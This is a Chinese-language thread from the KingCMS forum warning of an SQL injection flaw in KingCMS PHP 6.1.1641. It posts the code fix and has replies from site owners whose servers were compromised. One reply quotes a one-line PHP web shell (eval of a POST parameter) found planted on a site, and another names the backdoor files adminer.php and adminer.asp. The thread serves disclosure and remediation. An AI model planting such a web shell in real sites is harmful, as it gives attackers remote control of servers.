KingCMS

首页下载博客模板服务帮助

K9 通用版博客版主题版地方门户版企业版 | 企业(ASP) 分类使用分享疑问模板建议帮助错误其他

+新建主题 [Ajax]

填写帐号密码即可完成注册

KingCMS官方网站 >> 论坛首页 >> 错误 >> 话题

提醒KingCMS PHP 6.1.1641重大漏洞，我已中招

12 3 4 Next >

leedon	发表于：13-08-21 10:28 `编辑于：08-21 16:30` [取消收藏] [添加收藏] 楼主 [回复] #Top#
人气：97 积分：456 金币：3731	KingCms 6.1.1641 SQL注入漏洞 6.1.1641版本中存在SQL注入漏洞，攻击者可以利用该漏洞，执行恶意SQL语句。属于“高危”级别安全漏洞，黑客可以通过这些漏洞，直接在网站上执行任意代码，控制网站及系统，最终导致“挂马”、“脱库”、“植入非法SEO链接”等我的服务器通过kingcms漏洞旁蛀到整个服务器其他网站，上传了几十万条SEO垃圾外链。主站受到严重影响。希望官方引起重视。解决办法 1、打开文件/system/lib/kc_template_class.php，找到如下代码： case 'get': $s=kc_get($name,0); $validate=kc_val($attrib,'validate'); 替换为 case 'get': $s=htmlspecialchars(kc_get($name,0)); $validate=kc_val($attrib,'validate'); 2、打开文件search.php代码，找到如下代码（注意：代码共有两处，都要替换）： $modelid=isset($_GET['modelid']) ? $_GET['modelid'] : $currentArray['modelid']; 替换为 $modelid=isset($_GET['modelid']) ? intval($_GET['modelid']) : $currentArray['modelid']; PS：感谢提供，已制成补丁包以附件形式上传。【点击下载】好名字容易娶媳妇？ SEO学堂悦买网-专业导购网地方站长集结1号群德阳123 Ta最近还发表过 [分享] 用了3年kingcms终于改版了，大家看下版本能达标么 (15-03-22) [错误] 提醒KingCMS PHP 6.1.1641重大漏洞，我已中招 (15-02-07) [使用] 走一走，瞧一瞧啊，来看看kingcms php安全性如何？ (14-07-01) [错误] 我只能跪求官方修复PHP版本SQL注入漏洞和跨站RSS漏洞 (14-03-13) [其他] 刚才服务器维护，我以为会改版上K9呢 (13-09-30) 随机阅读 [疑问] 为什么不把地方门户单独分一个版块出来呢？ (12-08-01) [分享] 网站批量挑选关键词的技巧 (12-05-14) [其他] K 币？？？？？？？？？？ (11-12-25) [使用] 通过碎片实现一级栏目调用子栏目列表 (11-07-22) [疑问] 认证会员 (11-07-15)

leedon

发表于：13-08-21 10:28 编辑于：08-21 16:30 [取消收藏] [添加收藏] 楼主 [回复] #Top#

人气：97 积分：456 金币：3731

KingCms 6.1.1641 SQL注入漏洞

6.1.1641版本中存在SQL注入漏洞，攻击者可以利用该漏洞，执行恶意SQL语句。属于“高危”级别安全漏洞，黑客可以通过这些漏洞，直接在网站上执行任意代码，控制网站及系统，最终导致“挂马”、“脱库”、“植入非法SEO链接”等

我的服务器通过kingcms漏洞旁蛀到整个服务器其他网站，上传了几十万条SEO垃圾外链。主站受到严重影响。

希望官方引起重视。

解决办法

1、打开文件/system/lib/kc_template_class.php，找到如下代码：

  case 'get':
    $s=kc_get($name,0); 
    $validate=kc_val($attrib,'validate');

替换为

 case 'get':
  $s=htmlspecialchars(kc_get($name,0));
  $validate=kc_val($attrib,'validate');

2、打开文件search.php代码，找到如下代码（注意：代码共有两处，都要替换）：

 $modelid=isset($_GET['modelid']) ? $_GET['modelid'] : $currentArray['modelid'];

替换为

 $modelid=isset($_GET['modelid']) ? intval($_GET['modelid']) : $currentArray['modelid'];

PS：感谢提供，已制成补丁包以附件形式上传。【点击下载】

好名字容易娶媳妇？ SEO学堂悦买网-专业导购网地方站长集结1号群德阳123

Ta最近还发表过 [分享] 用了3年kingcms终于改版了，大家看下版本能达标么 (15-03-22) [错误] 提醒KingCMS PHP 6.1.1641重大漏洞，我已中招 (15-02-07) [使用] 走一走，瞧一瞧啊，来看看kingcms php安全性如何？ (14-07-01) [错误] 我只能跪求官方修复PHP版本SQL注入漏洞和跨站RSS漏洞 (14-03-13) [其他] 刚才服务器维护，我以为会改版上K9呢 (13-09-30)

随机阅读 [疑问] 为什么不把地方门户单独分一个版块出来呢？ (12-08-01) [分享] 网站批量挑选关键词的技巧 (12-05-14) [其他] K 币？？？？？？？？？？ (11-12-25) [使用] 通过碎片实现一级栏目调用子栏目列表 (11-07-22) [疑问] 认证会员 (11-07-15)

勾股定理	发表于：13-08-21 10:40 沙发 [回复] #Top#
人气：3 积分：15 金币：136	很感谢您的分享....赶紧修复...

wuchunkai	发表于：13-08-21 12:24 板凳 [回复] #Top#
人气：472 积分：6 金币：19338	我的也中招了。

催命判官	发表于：13-08-21 16:13 `编辑于：08-21 16:31` 4楼 [回复] #Top#
人气：495 积分：3020 金币：26497	感谢提供，请各位参考修改。补丁我已经补充到楼主的帖子尾部。另外，网站上的下载包已经更新。

leedon	发表于：13-08-22 09:55 5楼 [回复] #Top#
人气：97 积分：456 金币：3731	请大家打好补丁，并搜索一下 ,adminer.php，adminer.asp 这个2个文件。他们可以获得服务器最高权限，想干啥都行。我的现在都还没清理干净

killhook	发表于：13-08-22 11:32 6楼 [回复] #Top#
人气：30 积分：44 金币：738	非常感谢

toymen	发表于：13-08-22 22:27 `编辑于：08-22 22:30` 7楼 [回复] #Top#
人气：518 积分：3458 金币：23864	真幸运，中招了，被人植入这个： <?php @eval($_POST['cmd']);?>

wuchunkai	发表于：13-08-23 10:10 8楼 [回复] #Top#
人气：472 积分：6 金币：19338	估计不少人中招

qidaimaoxian	发表于：13-08-23 10:54 9楼 [回复] #Top#
人气：0 积分：2 金币：0	非常感谢

yadajixi	发表于：13-08-23 14:46 10楼 [回复] #Top#
人气：10 积分：77 金币：500	灰常感谢呀！

12 3 4 Next >

发表回复

帐号	匿名发布审核后可见 [加载完整在线编辑器]
内容
验证码	计算题太难?换个简单点的.

我已认真阅读服务条款，并遵守具体协议内容

KingCMS 内容管理系统

关于我们联系我们广告报价付款方式站点导航

广州唯众网络科技有限公司粤ICP备08008106号